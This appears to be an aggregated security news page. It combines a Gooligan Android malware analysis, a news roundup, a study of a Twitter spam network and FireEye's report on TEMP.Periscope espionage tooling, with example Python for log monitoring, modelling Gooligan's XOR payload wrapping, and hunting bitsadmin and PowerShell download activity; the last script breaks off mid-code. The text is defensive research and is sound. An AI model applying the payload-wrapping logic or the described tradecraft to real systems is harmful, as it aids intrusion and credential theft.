- Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
- Restrict system access as appropriate, and review user access levels on a regular basis.
- Don’t forget to address the physical security of hardware, such as laptops.
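As an added illustration of the monitoring recommended above (example code written for this page, not from the Verizon or Accenture reports or from Continuum GRC), the following Python scans EHR audit-log lines for three things the Verizon figures point at: access to a patient with no documented treatment or business relationship, record-access volume that is unusual for one user in one hour, and access outside business hours. The log format, the RELATIONSHIPS table, the thresholds and the sample log lines are all constructed assumptions.

```python
"""Flag PHI accesses worth a reviewer's attention in an EHR audit log.

Added example for this page; not code from the Verizon or Accenture reports.
The log format, RELATIONSHIPS table, thresholds and sample lines are all
constructed assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime

# Constructed sample audit lines: timestamp|user|role|patient_id|action
SAMPLE_LOG = """\
2018-03-12T09:02:11|jsmith|nurse|P1001|VIEW
2018-03-12T09:05:40|jsmith|nurse|P1002|VIEW
2018-03-12T09:07:03|jsmith|nurse|P2077|VIEW
2018-03-12T10:15:22|dlee|billing|P1001|VIEW
2018-03-12T10:16:01|dlee|billing|P1003|VIEW
2018-03-12T10:16:30|dlee|billing|P1004|VIEW
2018-03-12T10:17:02|dlee|billing|P1005|VIEW
2018-03-12T10:17:40|dlee|billing|P1006|VIEW
2018-03-12T10:18:15|dlee|billing|P1007|VIEW
2018-03-12T23:41:09|rgarcia|physician|P1001|VIEW
"""

# Constructed treatment/business relationships (assumed to be exported from
# the scheduling or billing system): user -> patients they legitimately work with.
RELATIONSHIPS = {
    "jsmith": {"P1001", "P1002"},
    "dlee": {"P1001", "P1003", "P1004", "P1005", "P1006", "P1007"},
    "rgarcia": {"P1001"},
}

# Hypothetical thresholds; tune per role in a real deployment.
MAX_DISTINCT_PATIENTS_PER_HOUR = 5
BUSINESS_HOURS = range(7, 20)  # 07:00 to 19:59


@dataclass(frozen=True)
class Finding:
    user: str
    rule: str
    detail: str


def parse_log(text):
    """Parse pipe-separated audit lines into (timestamp, user, role, patient, action)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, role, patient, action = line.split("|")
        events.append((datetime.fromisoformat(ts), user, role, patient, action))
    return events


def audit(events, relationships=RELATIONSHIPS):
    """Return findings for accesses without a relationship, after-hours
    accesses, and users touching too many distinct charts in one hour."""
    findings = []
    patients_per_user_hour = defaultdict(set)
    for ts, user, role, patient, action in events:
        if patient not in relationships.get(user, set()):
            findings.append(Finding(user, "no_relationship",
                                    f"{role} {action} {patient} at {ts.isoformat()}"))
        if ts.hour not in BUSINESS_HOURS:
            findings.append(Finding(user, "after_hours",
                                    f"{role} {action} {patient} at {ts.isoformat()}"))
        patients_per_user_hour[(user, ts.strftime("%Y-%m-%dT%H"))].add(patient)
    for (user, hour), patients in patients_per_user_hour.items():
        if len(patients) > MAX_DISTINCT_PATIENTS_PER_HOUR:
            findings.append(Finding(user, "volume",
                                    f"{len(patients)} distinct patients in hour {hour}"))
    return findings


def audit_text(text):
    """Convenience wrapper: parse and audit raw log text."""
    return audit(parse_log(text))


if __name__ == "__main__":
    for f in audit_text(SAMPLE_LOG):
        print(f"{f.user:8} {f.rule:16} {f.detail}")
```

Findings go to a reviewer; nothing here blocks access, because the point of the paragraph above is that a clinician who needs a record must get it. An after-hours view by a physician who has a relationship with the patient is ordinarily legitimate and is surfaced only so it is logged against the policy; a billing clerk paging through many distinct charts in a few minutes, or a nurse opening a chart outside her assignment, are the cases the reports describe.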
The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.
Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.
Retired 4-Star Army General Calls Trump A ‘Serious Threat To National Security’
Taking down Gooligan: part 2 — inner workings
This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.
This is the second post of a series dedicated to the hunt and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemes and its takedown. As this post builds on the previous one, I encourage you to read it if you haven’t done so already.
This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:
You can also get the slides here but they are pretty bare.
Infection
Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:
As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push. The Gooligan authors’ main addition is the code needed to instrument the Play Store app through a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had analyzed the full kill chain, we were able to write accurate detection signatures.
Payload decoding
Most Gooligan samples hide their malicious payload in a fake image located at assets/close.png. This file is encrypted with a hardcoded XOR function. The encryption exists to evade the signatures that detect the code Gooligan borrows from earlier malware. Encrypting the malicious payload is a very old malware trick, used by Android malware since at least 2011.
Besides its encryption function, one of the most prominent Gooligan quirks is its odd (and weak) integrity verification. Nominally, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this scheme is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five; nothing between those bytes is verified at all.
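To make that quirk concrete, here is a small model of the check and of the XOR unwrapping, written for this page rather than taken from a Gooligan sample. The repeating three-byte key, the five-byte marker and the sample payload are assumptions (the post does not publish the real key), so only the shape of the logic is faithful. The last function shows why the check is weak: only the first ten and the last five bytes are examined, so any change to the encrypted body passes.

```python
"""Model of Gooligan's close.png unwrapping as described in the post.

Added example; not the malware's code. ASSUMED_KEY, MARKER and the sample
payload are assumptions made for illustration.
"""

ASSUMED_KEY = b"\x5a\xa5\x3c"   # hypothetical repeating XOR key
MARKER = b"GOOLI"               # hypothetical five-byte value playing val1/val2


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def integrity_ok(blob: bytes) -> bool:
    """The check the post describes: val1 = bytes 1-5 must equal the last five
    bytes, and val2 = bytes 6-10 must equal the first five bytes. Everything
    between byte 10 and the last five bytes is ignored."""
    if len(blob) < 15:
        return False
    val1 = blob[0:5]
    val2 = blob[5:10]
    return val1 == blob[-5:] and val2 == blob[0:5]


def wrap_payload(payload: bytes, key: bytes = ASSUMED_KEY, marker: bytes = MARKER) -> bytes:
    """Build a blob that satisfies integrity_ok: marker, marker, encrypted body, marker."""
    assert len(marker) == 5
    return marker + marker + xor_bytes(payload, key) + marker


def unwrap_payload(blob: bytes, key: bytes = ASSUMED_KEY) -> bytes:
    """Verify and decrypt; raises if the (weak) check fails."""
    if not integrity_ok(blob):
        raise ValueError("close.png integrity check failed")
    return xor_bytes(blob[10:-5], key)


def body_tamper_passes(blob: bytes) -> bool:
    """Flip one byte of the encrypted body and report whether the check still
    passes. It does, which is why this is not really an integrity check."""
    tampered = bytearray(blob)
    tampered[10] ^= 0xFF
    return integrity_ok(bytes(tampered))


if __name__ == "__main__":
    blob = wrap_payload(b"classes.dex placeholder")
    print(unwrap_payload(blob))
    print("tampered body still passes:", body_tamper_passes(blob))
```

The practical consequence for an analyst is that the check gives no help in deciding whether a close.png has been modified; a detection signature has to key on the XOR routine or on the decrypted payload, not on the marker bytes.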
Phone rooting
As alluded to earlier, Gooligan, like Snappea and Ghost Push, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages. First, the malware gathers information about the phone and sends it to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored to the device. Finally, upon receiving the payload, the malware runs it to gain root access.
The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don’t want to invest in it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. The pattern is common across every platform: more recently, the leaked NSA exploit EternalBlue was weaponized by NotPetya, a wiper disguised as ransomware. If you are interested in ransomware actors, check my posts on the subject.
Persistence setup
Upon rooting the device, Gooligan patches the install-recovery.sh script to ensure that it survives a factory reset. From a remediation perspective, this resilience mechanism was the most problematic aspect of Gooligan, because on the oldest devices it left us with only an OTA (over-the-air) update or re-flashing the device as ways to remove it. The reason is that very old devices don’t have verified boot, which was introduced in Android 4.4.
This difficult context, combined with the urgent need to help our users, led us to resort to a strategy that we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure that the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from the NorCert worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).
Play store app manipulation
The final step of the infection is the injection of a shared library into the Play Store app. This shared library allows Gooligan to manipulate the Play Store app to download apps and inject reviews.
We traced the injection code back to publicly shared code. The library itself is very bare: the authors added only the code needed to call Play Store functions. All the fraud logic is in the main app, probably because the authors are more familiar with Java than C.
Impacted devices
Geo-distribution
Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.
Make
In terms of devices, as shown in the bar chart above, infections are spread across all the big brands, with Samsung and Micromax unsurprisingly the most affected given their market share. Micromax is the leading Indian phone maker; it is not well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and sells in quite a few countries besides India, most notably Russia.
Attribution
Initial clue
Buried deep inside Gooligan’s patient-zero code, Check Point researchers Andrey Polkovnichenko, Yoav Flint Rosenfeld, and Feixiang He, who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load balancer configuration, which in turn led to the full configuration file of Gooligan’s backend services.
#Ads API
acl is_ads path_beg /overseaads/
use_backend overseaads if is_ads
…
#Payment API
acl is_paystatis path_beg /overseapay/admin/
use_backend overseapaystatis if is_paystatis
...
# Play install
acl is_appstore path_beg /appstore/
use_backend overseapaystatis if is_appstore
...
Analyzing the exposed HAProxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had APIs for click fraud, for receiving payment from clients, and for Play Store abuse. While not visible above, there was also a complex admin and statistics API.
Infrastructure
Combining the API endpoints and IPs exposed in the HAProxy configuration with our knowledge of the Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split between two main data centers: one in China and one overseas in the US, which used Amazon AWS IPs. After the takedown, all the infrastructure moved back to China.
Note: in the above diagram, the fraud endpoint appears twice. This is not a mistake: at Gooligan’s peak, its authors split it out to sustain the load and better distribute the requests.
Actor
So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe that it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it is mostly focused on running various fraudulent schemes. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful who you buy ads or installs from. If it is too good to be true...
In the final post of the series, I discuss Gooligan’s various monetization schemes and its takedown. See you there!
Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading
On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”
Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.
In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.
Other trending cybercrime events from the week include:
- Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
- State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
- Other data breaches: A misconfiguration at Florida Virtual School led to the personal information of 368,000 students as well as thousands of former and current Leon County Schools employees being compromised. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments. The Nampa School District said that an email account compromise may have compromised the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
- Arrests and legal actions: A Maryland man was sentenced to 12 years in prison for his role in a multi-million dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees are affected by the discovery that three employee email accounts in finance, payroll, and operations had been auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
- Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Two of the largest data breaches of recent memory were back in the news this week due to Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach as well as a former Equifax employee being charged with insider trading related to its massive breach.
Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.
“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.
While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.
Last week the SEC officially filed a complaint that alleges that Jun Ying, who was next in line to be the company’s global CIO, conducted insider trading by using confidential information entrusted to him by the company to conclude Equifax had suffered a serious breach, and Ying then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.
“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.
Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.
Good To Be Back – Paul’s Security Weekly #551
This week, Patrick Laverty of Rapid7 joins us for an interview! Dick Wilkins of Phoenix Technologies joins us for our second feature interview! In the news, we have updates from Flash, Pwn2Own, VMware, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode551
Visit https://www.securityweekly.com/psw for all the latest episodes!
U.S. Blames Russia for Cyber Attacks on Energy Infrastructure
On March 15, 2018, the Trump Administration took the unprecedented step of publicly blaming the Russian government for carrying out cyber attacks on American energy infrastructure. According to a joint Technical Alert issued by the Department of Homeland Security and the FBI, beginning at least as early as March 2016, Russian government cyber actors carried out a “multi-stage intrusion campaign” that sought to penetrate U.S. government entities and a wide range of U.S. critical infrastructure sectors, including “organizations in the energy, nuclear, commercial facilities, water, aviation and critical manufacturing sectors.”
The attacks involved the Russian government gaining remote access to energy sector networks and other intended targets via malware and spear phishing of “staging targets” that had preexisting relationships with the intended targets. Once the hackers gained access to their intended targets, they used that access to conduct network reconnaissance and collect information on Industrial Control Systems and Supervisory Control and Data Acquisition infrastructure, among other attacks. Although Russia’s motive was not clear, “cyber security experts and former U.S. officials say such behavior is generally espionage-oriented with the potential, if needed, for sabotage.” Indeed, the Russian government has also been linked to attacks on the Ukrainian energy grid in 2015-2016 that “caused temporary blackouts for hundreds of thousands of customers and were considered first-of-their-kind assaults.”
The Technical Alert includes recommended detection and prevention guidelines for network administrators to help defend against similar attacks in the future.
Ethical Hacking with Metasploit the Penetration Testing Tool – 75% OFF
Google’s new Gaming Venture: A New Player?
Marketing “Dirty Tinder” On Twitter
About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:
All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:
- Check out
- Check this
- How do you like my site
- How do you like me
- You love it harshly
- Do you like fast
- Do you like it gently
- Come to my site
- Come in
- Come on
- Come to me
- I want you
- You want me
- Your favorite
- Waiting you
- Waiting you at
All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:
- me2url.info
- url4.pro
- click2go.info
- move2.pro
- zen5go.pro
- go9to.pro
It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:
My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.
Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.
The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.
My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:
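For readers who want to see the shape of that crawl, below is an offline model of it written for this page; it is not the author’s script and nothing in it talks to Twitter. A FakeTwitter class stands in for the API, with a per-window call budget that forces the same throttle-and-wait loop a real crawler needs for the rate limit; its accounts, follow edges and profile descriptions are constructed. Accounts qualify by the traits listed above (one of the description phrases plus a link to one of the shortener domains), the crawl is breadth-first over friends and followers, and a final pass splits the result into connected components, which is what the post’s independent "clusters" are.

```python
"""Offline model of the follower/friend crawl described in the post. Added example,
not the author's script; FakeTwitter's accounts, edges and descriptions are constructed."""
import re
from collections import defaultdict, deque

# Traits from the post: description phrases and URL-shortener domains.
TRAIT_PHRASES = ("check out", "check this", "how do you like my site", "come to my site",
                 "come to me", "i want you", "you want me", "waiting you")
SHORTENER_DOMAINS = {"me2url.info", "url4.pro", "click2go.info", "move2.pro", "zen5go.pro", "go9to.pro"}
DOMAIN_RE = re.compile(r"https?://([a-z0-9.-]+)")

def looks_like_spam_profile(description):
    """Qualify an account: a trait phrase AND a link to one of the shortener domains."""
    text = description.lower()
    has_phrase = any(p in text for p in TRAIT_PHRASES)
    has_domain = any(d in SHORTENER_DOMAINS for d in DOMAIN_RE.findall(text))
    return has_phrase and has_domain

class RateLimited(Exception): pass

class FakeTwitter:
    """Stand-in for the API: profiles, follow edges, and a per-window call budget."""
    def __init__(self, profiles, follows, calls_per_window=10):
        self.profiles = profiles  # screen_name -> description
        self.follows = {k: set(v) for k, v in follows.items()}  # screen_name -> friends
        self.followers = defaultdict(set)
        for src, dsts in self.follows.items():
            for dst in dsts:
                self.followers[dst].add(src)
        self.calls_per_window, self.calls_in_window, self.windows_waited = calls_per_window, 0, 0
    def _call(self):
        if self.calls_in_window >= self.calls_per_window:
            raise RateLimited()
        self.calls_in_window += 1
    def wait_for_reset(self):  # a real crawler sleeps until x-rate-limit-reset
        self.windows_waited += 1
        self.calls_in_window = 0
    def description(self, name): self._call(); return self.profiles.get(name, "")
    def friends(self, name): self._call(); return set(self.follows.get(name, ()))
    def followers_of(self, name): self._call(); return set(self.followers.get(name, ()))

def throttled(api, fn, *args):
    """Retry a call after waiting out the rate-limit window."""
    while True:
        try:
            return fn(*args)
        except RateLimited:
            api.wait_for_reset()

def crawl(api, seeds, max_queries=1000):
    """Breadth-first over friends and followers, keeping only spam-looking accounts;
    returns the discovered accounts and the undirected follow edges between them."""
    queue, found, edges, queried = deque(seeds), set(seeds), set(), 0
    while queue and queried < max_queries:
        name = queue.popleft()
        queried += 1
        neighbours = throttled(api, api.friends, name) | throttled(api, api.followers_of, name)
        for other in sorted(neighbours):
            if other not in found:
                if not looks_like_spam_profile(throttled(api, api.description, other)):
                    continue  # ordinary account: record nothing, do not expand
                found.add(other)
                queue.append(other)
            edges.add(frozenset((name, other)))
    return found, edges

def clusters(nodes, edges):
    """Connected components of the discovered graph (the post's 'clusters')."""
    adj = defaultdict(set)
    for a, b in (tuple(e) for e in edges):
        adj[a].add(b)
        adj[b].add(a)
    remaining, out = set(nodes), []
    while remaining:
        comp, stack = set(), [remaining.pop()]
        while stack:
            n = stack.pop()
            comp.add(n)
            stack.extend(m for m in adj[n] if m in remaining)
            remaining -= adj[n]
        out.append(frozenset(comp))
    return out

# Constructed network: two "flower" clusters (a hub and its petals) plus one
# ordinary account that follows a petal and must not be pulled in.
PROFILES = {
    "a0": "Come to my site http://me2url.info/x7k", "a1": "Come to me https://url4.pro/1a",
    "a2": "Check out http://me2url.info/q2", "a3": "I want you https://click2go.info/9z",
    "a4": "You want me https://move2.pro/u5", "b0": "Waiting you at https://go9to.pro/q1",
    "b1": "Come to my site https://zen5go.pro/m3", "b2": "Check this https://go9to.pro/w8",
    "b3": "How do you like my site http://url4.pro/k4", "alice": "Security nerd, coffee, https://example.org",
}
FOLLOWS = {"a0": {"a1", "a2", "a3", "a4"}, "a1": {"a0"}, "a2": {"a0"}, "a3": {"a0"}, "a4": {"a0"},
           "b0": {"b1", "b2", "b3"}, "b1": {"b0"}, "b2": {"b0"}, "b3": {"b0"}, "alice": {"a1"}}

def run_demo():
    """Crawl from two seeds; return accounts found, the clusters, and windows waited."""
    api = FakeTwitter(PROFILES, FOLLOWS, calls_per_window=10)
    found, edges = crawl(api, ["a1", "b1"])
    return found, [sorted(c) for c in clusters(found, edges)], api.windows_waited
```

The design choice worth noting is that a non-matching neighbour is neither recorded nor expanded: that is what keeps the crawl from wandering into the ordinary Twitter graph, and it is also why accounts that belong to the network but have an unusual description are missed. With a real client the call to wait_for_reset becomes a sleep until the reset time the API reports, which is why the author's run took days.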

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.
The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.
After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.
Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.
Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:
Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.
One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:
As you can see, this group has fewer new accounts in it than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason why there are fewer new accounts in this network is that Twitter’s automation seems to be able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.
Here are a few more breakdowns – Tweets published, likes, followers and following.
Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets.
So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:
Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.
If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.
The Wizard of Value – Enterprise Security Weekly #83
This week, Rami Essaid, Founder of Distil Networks joins us for an interview! In the news, we have updates from CyberArk, Tenable, Fortinet, & Rapid7! Our very own Michael Santarcangelo is joined by Matt Alderman on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode83
Visit https://www.securityweekly.com/esw for all the latest episodes!
Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries
Intrusions Focus on the Engineering and Maritime Sector
Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.
The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.
TEMP.Periscope Background
Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”
TTPs and Malware Used
In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:
- AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
- BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
- PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
- HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
- LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
- MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
- China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.
The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:
- Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
- BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.
Additional identifying TTPs include:
- Spear phishing, including the use of probably compromised email accounts.
- Lure documents using CVE-2017-11882 to drop malware.
- Stolen code signing certificates used to sign malware.
- Use of bitsadmin.exe to download additional tools.
- Use of PowerShell to download additional tools.
- Using C:\Windows\Debug and C:\Perflogs as staging directories.
- Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
- Using Windows Management Instrumentation (WMI) for persistence.
- Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
- Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.
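Several of the TTPs above leave traces in ordinary process-creation telemetry. The following Python, added here as an example and not FireEye’s detection content, runs a handful of hunting rules over Sysmon-style process events: bitsadmin.exe transfers, PowerShell download cradles, wscript.exe or cscript.exe launched against a script in a Startup folder, executables staged in C:\Windows\Debug or C:\PerfLogs, and a shell spawned by WmiPrvSE.exe, a common trace of WMI event-subscription persistence. The event fields, the sample events, the file names and paths, and the 203.0.113.5 address are all constructed; none of them are indicators from the report.

```python
"""Hunt TEMP.Periscope-style tradecraft in process-creation events.

Added example for this page, not FireEye detection content. The Sysmon-like
event dicts, file names and the 203.0.113.5 address are constructed.
"""
import re

STAGING_DIRS = ("c:\\windows\\debug\\", "c:\\perflogs\\")
STARTUP_DIR_RE = re.compile(r"\\start menu\\programs\\startup\\")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe")
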